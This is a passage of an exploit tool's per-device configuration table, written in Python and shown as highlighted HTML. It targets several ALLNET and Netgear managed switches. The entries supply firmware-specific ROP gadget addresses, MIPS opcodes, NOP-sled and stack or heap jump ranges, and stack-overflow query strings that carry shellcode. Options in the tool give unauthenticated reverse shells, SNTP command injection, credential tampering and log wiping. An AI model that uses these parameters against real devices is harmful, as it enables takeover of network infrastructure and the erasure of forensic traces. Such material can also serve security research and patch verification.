			<span class="token comment"># Del credentials        : Yes</span>
			<span class="token comment">#</span>
			<span class="token string">'752-76347'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
				<span class="token string">'model'</span><span class="token punctuation">:</span><span class="token string">'ALL-SG8208M'</span><span class="token punctuation">,</span>
				<span class="token string">'template'</span><span class="token punctuation">:</span><span class="token string">'ALLNET_JSON'</span><span class="token punctuation">,</span>					<span class="token comment"># Static for the vendor</span>
				<span class="token string">'version'</span><span class="token punctuation">:</span><span class="token string">'2.2.1'</span><span class="token punctuation">,</span>						<span class="token comment"># Version / binary dependent stuff</span>
				<span class="token string">'exploit'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
					<span class="token string">'heack_hydra_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/bin/boa; embedparse() </span>
						<span class="token string">'gadget'</span><span class="token punctuation">:</span> <span class="token number">0x40C4FC</span><span class="token punctuation">,</span>				<span class="token comment"># Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)</span>
														<span class="token comment"># /sqfs/bin/boa; read_body(); </span>
						<span class="token string">'system'</span><span class="token punctuation">:</span> <span class="token number">0x8f998528</span><span class="token punctuation">,</span>			<span class="token comment"># la $t9, system # opcode, binary dependent</span>
														<span class="token comment"># /sqfs/bin/boa; read_body(); </span>
						<span class="token string">'handler'</span><span class="token punctuation">:</span> <span class="token number">0x248498dc</span><span class="token punctuation">,</span>			<span class="token comment"># addiu $a0, (.ascii "handler -c boa &amp;" - 0x430000) # (opcode, binary dependent)</span>
						<span class="token string">'v0'</span><span class="token punctuation">:</span> <span class="token number">7</span><span class="token punctuation">,</span>						<span class="token comment"># Should leave as-is (but you can play between 5 - 8)</span>

						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_diag'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_add_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_del_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_log'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_log_settings_set()</span>
						<span class="token string">'log_settings_set'</span><span class="token punctuation">:</span><span class="token number">0x412ADC</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Disable Logging (address, binary dependent)</span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_log_ramClear_set()</span>
						<span class="token string">'log_ramClear'</span><span class="token punctuation">:</span><span class="token number">0x412A24</span><span class="token punctuation">,</span>		<span class="token comment"># Jump one after 'sw $ra'			# Clean RAM log (address, binary dependent)</span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_log_fileClear_set()</span>
						<span class="token string">'log_fileClear'</span><span class="token punctuation">:</span><span class="token number">0x412A24</span><span class="token punctuation">,</span>		<span class="token comment"># Jump one after 'sw $ra'			# Clean FILE log (address, binary dependent)</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_sntp'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()</span>
						<span class="token string">'sys_timeSntp_set'</span><span class="token punctuation">:</span><span class="token number">0x40FA74</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Set SNTP Server (Inject RCE)</span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()</span>
						<span class="token string">'sys_timeSntpDel_set'</span><span class="token punctuation">:</span><span class="token number">0x40FA74</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Delete (address, binary dependent) </span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()</span>
						<span class="token string">'sys_timeSettings_set'</span><span class="token punctuation">:</span><span class="token number">0x40FA74</span><span class="token punctuation">,</span><span class="token comment"># Jump one after 'sw $ra'			# Enable/Disable (address, binary dependent)</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span> 
					<span class="token string">'heack_cgi_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'cgi'</span><span class="token punctuation">:</span><span class="token string">'set.cgi'</span><span class="token punctuation">,</span>				<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_home_loginAuth_set()</span>
						<span class="token string">'START'</span><span class="token punctuation">:</span><span class="token number">0x7ffeff04</span><span class="token punctuation">,</span>				<span class="token comment"># start: Stack overflow RA, used for searching NOP sled by blind jump</span>
						<span class="token string">'STOP'</span><span class="token punctuation">:</span><span class="token number">0x7fc60000</span><span class="token punctuation">,</span>				<span class="token comment"># end: You may want to play with this if you dont get it working</span>
						<span class="token string">'usr_nop'</span><span class="token punctuation">:</span> <span class="token number">64</span><span class="token punctuation">,</span>					<span class="token comment"># NOP sled (shellcode will be tailed)</span>
						<span class="token string">'pwd_nop'</span><span class="token punctuation">:</span> <span class="token number">77</span><span class="token punctuation">,</span>					<span class="token comment"># filler/garbage (not used for something constructive)</span>
						<span class="token string">'align'</span><span class="token punctuation">:</span> <span class="token number">3</span><span class="token punctuation">,</span>						<span class="token comment"># Align opcodes in memory</span>
						<span class="token string">'stack'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>					<span class="token comment"># NOP and shellcode lays on: True = stack, False = Heap</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
			<span class="token punctuation">}</span><span class="token punctuation">,</span>

			<span class="token comment">#</span>
			<span class="token comment"># ALLNET GmbH Computersysteme </span>
			<span class="token comment"># Not JSON based SG8xxx</span>
			<span class="token comment"># (Traces in this image: 3One Data Communication, Saitian, Sangfor, Sundray, Gigamedia, GetCK, Hanming Technology, Wanbroad, Plexonics, Mach Power, Gigamedia, TG-NET)</span>
			<span class="token comment">#</span>
			<span class="token comment"># CGI Reverse Shell      : Yes</span>
			<span class="token comment"># Boa/Hydra reverse shell: Yes</span>
			<span class="token comment"># Del /var/log/ram.log   : Yes</span>
			<span class="token comment"># Del /var/log/flash.log : No</span>
			<span class="token comment"># Del /mntlog/flash.log  : No</span>
			<span class="token comment"># Add credentials        : Yes</span>
			<span class="token comment"># Del credentials        : Yes</span>
			<span class="token comment">#</span>
			<span class="token string">'222-50100'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
				<span class="token string">'template'</span><span class="token punctuation">:</span><span class="token string">'ALLNET'</span><span class="token punctuation">,</span>					<span class="token comment"># Static for the vendor</span>
				<span class="token string">'version'</span><span class="token punctuation">:</span><span class="token string">'3.1.1-R3-B1'</span><span class="token punctuation">,</span>					<span class="token comment"># Version / binary dependent stuff</span>
				<span class="token string">'model'</span><span class="token punctuation">:</span><span class="token string">'ALL-SG8310PM'</span><span class="token punctuation">,</span>				<span class="token comment"># Model</span>
				<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'https://www.allnet.de/en/allnet-brand/produkte/switches/entry-line-layer2-smart-managed-unamanged/poe-switches0/p/allnet-all-sg8310pm-smart-managed-8-port-gigabit-4x-hpoe'</span><span class="token punctuation">,</span>
				<span class="token string">'exploit'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
					<span class="token string">'heack_hydra_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/bin/boa; embedparse() </span>
						<span class="token string">'gadget'</span><span class="token punctuation">:</span> <span class="token number">0x40C74C</span><span class="token punctuation">,</span>				<span class="token comment"># Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)</span>
														<span class="token comment"># /sqfs/bin/boa; read_body(); </span>
						<span class="token string">'system'</span><span class="token punctuation">:</span> <span class="token number">0x8f99851c</span><span class="token punctuation">,</span>			<span class="token comment"># la $t9, system) # opcode, binary dependent</span>
														<span class="token comment"># /sqfs/bin/boa; read_body(); </span>
						<span class="token string">'handler'</span><span class="token punctuation">:</span> <span class="token number">0x2484029c</span><span class="token punctuation">,</span>			<span class="token comment"># addiu $a0, (.ascii "handler -c boa &amp;" - 0x430000) # (opcode, binary dependent)</span>
						<span class="token string">'v0'</span><span class="token punctuation">:</span> <span class="token number">7</span><span class="token punctuation">,</span>						<span class="token comment"># Should leave as-is (but you can play between 5 - 8)</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_diag'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_add_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_del_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span> <span class="token comment">#</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_log'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_log_setting_post()</span>
						<span class="token string">'log_settings_set'</span><span class="token punctuation">:</span><span class="token number">0x46BB04</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Disable Logging (address, binary dependent)</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_log_file_del()</span>
						<span class="token string">'log_ramClear'</span><span class="token punctuation">:</span><span class="token number">0x46F240</span><span class="token punctuation">,</span>		<span class="token comment"># Jump one after 'sw $ra'			# Clean RAM log (address, binary dependent)</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_log_file_del()</span>
						<span class="token string">'log_fileClear'</span><span class="token punctuation">:</span><span class="token number">0x46F240</span><span class="token punctuation">,</span>		<span class="token comment"># Jump one after 'sw $ra'			# Clean FILE log (address, binary dependent)</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_sntp'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()</span>
						<span class="token string">'sys_timeSntp_set'</span><span class="token punctuation">:</span><span class="token number">0x426724</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Set SNTP Server (Inject CMD)</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()</span>
						<span class="token string">'sys_timeSntpDel_set'</span><span class="token punctuation">:</span><span class="token number">0x426724</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Delete (address, binary dependent) </span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_time_post()</span>
						<span class="token string">'sys_timeSettings_set'</span><span class="token punctuation">:</span><span class="token number">0x424D28</span><span class="token punctuation">,</span><span class="token comment"># Jump one after 'sw $ra'			# Enable/Disable (address, binary dependent)</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span> 

					<span class="token comment"># Interesting when there is a fresh heap with 0x00's (4 x 0x00 == MIPS NOP),</span>
					<span class="token comment"># and to fill wider area with sending '&amp;%8f%84%01=%8f%84%80%18' where:</span>
					<span class="token comment"># </span>
					<span class="token comment"># NOP's</span>
					<span class="token comment"># '24%04%FF=' : '=' will be replaced with 0x00, li $a0, 0xFFFFFF00</span>
					<span class="token comment"># '%24%04%FF%FF' : li $a0, 0xFFFFFFFF</span>
					<span class="token string">'heack_cgi_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'cgi'</span><span class="token punctuation">:</span><span class="token string">'dispatcher.cgi'</span><span class="token punctuation">,</span>			<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi; main()</span>
						<span class="token string">'query'</span><span class="token punctuation">:</span><span class="token string">'username='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">112</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_RA_START&amp;password='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">80</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'&amp;login=1'</span><span class="token operator">+</span> <span class="token punctuation">(</span><span class="token string">'&amp;%24%04%FF=%24%04%FF%FF'</span> <span class="token operator">*</span> <span class="token number">50</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_SHELLCODE'</span><span class="token punctuation">,</span>
						<span class="token string">'START'</span><span class="token punctuation">:</span><span class="token number">0x10010104</span><span class="token punctuation">,</span>				<span class="token comment"># start: Stack overflow RA, used for searching NOP sled by blind jump</span>
						<span class="token string">'STOP'</span> <span class="token punctuation">:</span><span class="token number">0x10600604</span><span class="token punctuation">,</span>				<span class="token comment"># end: You may want to play with this if you dont get it working</span>
						<span class="token string">'usr_nop'</span><span class="token punctuation">:</span> <span class="token number">28</span><span class="token punctuation">,</span>					<span class="token comment"># NOP sled (shellcode will be tailed)</span>
						<span class="token string">'pwd_nop'</span><span class="token punctuation">:</span> <span class="token number">20</span><span class="token punctuation">,</span>					<span class="token comment"># filler/garbage (not used for something constructive)</span>
						<span class="token string">'align'</span><span class="token punctuation">:</span> <span class="token number">0</span><span class="token punctuation">,</span>						<span class="token comment"># Align opcodes in memory</span>
						<span class="token string">'stack'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>					<span class="token comment"># NOP and shellcode lays on: True = stack, False = Heap</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
			<span class="token punctuation">}</span><span class="token punctuation">,</span>

			<span class="token comment">#</span>
			<span class="token comment"># Netgear inc.</span>
			<span class="token comment">#</span>
			<span class="token comment"># CGI Reverse Shell      : Yes</span>
			<span class="token comment"># Boa/Hydra reverse shell: Yes</span>
			<span class="token comment"># Del /var/log/ram.log   : No (logging do not exist)</span>
			<span class="token comment"># Del /var/log/flash.log : No (logging do not exist)</span>
			<span class="token comment"># Del /mntlog/flash.log  : No (logging do not exist)</span>
			<span class="token comment"># Add credentials        : No (Single account only)</span>
			<span class="token comment"># Del credentials        : No (Single account only)</span>
			<span class="token comment">#</span>
			<span class="token string">'609-31457'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
				<span class="token string">'template'</span><span class="token punctuation">:</span><span class="token string">'Netgear'</span><span class="token punctuation">,</span>						<span class="token comment"># Static for the vendor</span>
				<span class="token string">'model'</span><span class="token punctuation">:</span><span class="token string">'GS750E ProSAFE Plus Switch'</span><span class="token punctuation">,</span>
				<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'https://www.netgear.com/support/product/gs750e.aspx'</span><span class="token punctuation">,</span>
				<span class="token string">'version'</span><span class="token punctuation">:</span><span class="token string">'1.0.0.22'</span><span class="token punctuation">,</span>					<span class="token comment"># Version / binary dependent stuff</span>
				<span class="token string">'login'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
					<span class="token string">'encryption'</span><span class="token punctuation">:</span><span class="token string">'caesar'</span><span class="token punctuation">,</span>
					<span class="token string">'login_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=home_loginAuth'</span><span class="token punctuation">,</span>
					<span class="token string">'query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;password=PASSWORD&amp;err_flag=0&amp;err_msg=&amp;submt=&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token string">'verify'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span> 
						<span class="token string">'set.cgi'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "password" (PoC: crash CGI)'</span><span class="token punctuation">,</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'502'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=home_loginAuth'</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;password='</span> <span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">320</span><span class="token punctuation">)</span> <span class="token operator">+</span> <span class="token string">'&amp;err_flag=0&amp;err_msg=&amp;submt=&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token string">'exploit'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
					<span class="token string">'heack_hydra_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/bin/boa; embedparse() </span>
						<span class="token string">'gadget'</span><span class="token punctuation">:</span> <span class="token number">0x4102F8</span><span class="token punctuation">,</span>				<span class="token comment"># Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)</span>
														<span class="token comment"># /sqfs/bin/boa; read_body(); </span>
						<span class="token string">'system'</span><span class="token punctuation">:</span> <span class="token number">0x8f9984fc</span><span class="token punctuation">,</span>			<span class="token comment"># la $t9, system # opcode, binary dependent</span>
														<span class="token comment"># /sqfs/bin/boa; read_body(); </span>
						<span class="token string">'handler'</span><span class="token punctuation">:</span> <span class="token number">0x24840c6c</span><span class="token punctuation">,</span>			<span class="token comment"># addiu $a0, (.ascii "handler -c boa &amp;" - 0x430000) # (opcode, binary dependent)</span>
						<span class="token string">'v0'</span><span class="token punctuation">:</span> <span class="token number">7</span><span class="token punctuation">,</span>						<span class="token comment"># Should leave as-is (but you can play between 5 - 8)</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_diag'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_add_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_del_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span> <span class="token comment">#</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_log'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token comment">#</span>
					<span class="token comment"># Interesting, by adding 0xc1c1c1c1 to START/STOP, remote end will decode to our original START/STOP (including 0x00) =]</span>
					<span class="token comment">#</span>
					<span class="token string">'heack_cgi_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "password" (PoC: reverse shell)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'login_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=home_loginAuth'</span><span class="token punctuation">,</span>
						<span class="token string">'logout_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=home_logout'</span><span class="token punctuation">,</span>
						<span class="token string">'cgi'</span><span class="token punctuation">:</span><span class="token string">'set.cgi'</span><span class="token punctuation">,</span>			<span class="token comment"># /sqfs/home/web/cgi-bin/security.cgi; main()</span>
						<span class="token string">'START'</span><span class="token punctuation">:</span><span class="token number">0x10001210</span><span class="token punctuation">,</span>				<span class="token comment"># start: Stack overflow RA, used for searching NOP sled by blind jump</span>
						<span class="token string">'STOP'</span><span class="token punctuation">:</span><span class="token number">0x10006210</span><span class="token punctuation">,</span>				<span class="token comment"># end: You may want to play with this if you dont get it working</span>
						<span class="token string">'usr_nop'</span><span class="token punctuation">:</span> <span class="token number">50</span><span class="token punctuation">,</span>					<span class="token comment"># NOP sled (shellcode will be tailed)</span>
						<span class="token string">'pwd_nop'</span><span class="token punctuation">:</span> <span class="token number">79</span><span class="token punctuation">,</span>					<span class="token comment"># filler/garbage (not used for something constructive)</span>
						<span class="token string">'align'</span><span class="token punctuation">:</span> <span class="token number">0</span><span class="token punctuation">,</span>						<span class="token comment"># Align opcodes in memory</span>
						<span class="token string">'stack'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>					<span class="token comment"># NOP and shellcode lays on: True = stack, False = Heap</span>
						<span class="token string">'query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;password='</span> <span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">316</span><span class="token punctuation">)</span> <span class="token operator">+</span> <span class="token string">'_RA_START&amp;shellcode=_USRNOP_SHELLCODE&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>



					<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
			<span class="token punctuation">}</span><span class="token punctuation">,</span>

			<span class="token comment">#</span>
			<span class="token comment"># Netgear inc.</span>
			<span class="token comment">#</span>
			<span class="token comment"># Note: </span>
			<span class="token comment"># 'username' is vulnerable for stack overflow</span>
			<span class="token comment"># 'pwd' use 'encode()' and not vulnerable for stack overflow (so we cannot jump with 'buffer method'...)</span>
			<span class="token comment"># Boa/Hydra 'getFdStr()' loop modified, original xploit dont work (0x00 are now ok), weird 'solution' to have $t9 loaded with JMP in 'fwrite()'</span>
			<span class="token comment"># 'hash=&lt;MD5&gt;' tailing all URI's</span>
			<span class="token comment">#</span>
			<span class="token comment"># CGI Reverse Shell      : No</span>
			<span class="token comment"># Boa/Hydra reverse shell: Yes</span>
			<span class="token comment"># Del /var/log/ram.log   : No</span>
			<span class="token comment"># Del /var/log/flash.log : No</span>
			<span class="token comment"># Del /mntlog/flash.log  : No</span>
			<span class="token comment"># Add credentials        : No</span>
			<span class="token comment"># Del credentials        : No</span>
			<span class="token comment">#</span>
			<span class="token string">'639-98866'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
				<span class="token string">'template'</span><span class="token punctuation">:</span><span class="token string">'Netgear'</span><span class="token punctuation">,</span>						<span class="token comment"># Static for the vendor</span>
				<span class="token string">'model'</span><span class="token punctuation">:</span><span class="token string">'GS728TPv2, GS728TPPv2, GS752TPv2, GS752TPP'</span><span class="token punctuation">,</span>
				<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'https://kb.netgear.com/000060184/GS728TPv2-GS728TPPv2-GS752TPv2-GS752TPP-Firmware-Version-6-0-0-45'</span><span class="token punctuation">,</span>
				<span class="token string">'version'</span><span class="token punctuation">:</span><span class="token string">'6.0.0.45'</span><span class="token punctuation">,</span>					<span class="token comment"># Version / binary dependent stuff</span>
				<span class="token string">'info_leak'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
				<span class="token string">'hash_uri'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>	<span class="token comment"># tailed 'hash=' md5 hashed URI as csrf token</span>
				<span class="token string">'login'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
					<span class="token string">'encryption'</span><span class="token punctuation">:</span><span class="token string">'encode'</span><span class="token punctuation">,</span>
					<span class="token string">'login_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=home_loginAuth'</span><span class="token punctuation">,</span>
					<span class="token string">'query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;username=USERNAME&amp;pwd=PASSWORD&amp;err_flag=0&amp;err_msg=&amp;submt=&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token string">'verify'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span> 
						<span class="token string">'set.cgi'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username" (PoC: crash CGI)'</span><span class="token punctuation">,</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'502'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=home_loginAuth'</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;username='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">100</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'&amp;pwd=NOP&amp;err_flag=0&amp;err_msg=&amp;submt=&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token string">'exploit'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
					<span class="token string">'heack_hydra_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># </span>
						<span class="token string">'gadget'</span><span class="token punctuation">:</span> <span class="token number">0x45678C</span><span class="token punctuation">,</span>				<span class="token comment"># Direct heap address for NOP slep and shellcode</span>
														<span class="token comment"># /sqfs/bin/boa; read_body(); </span>
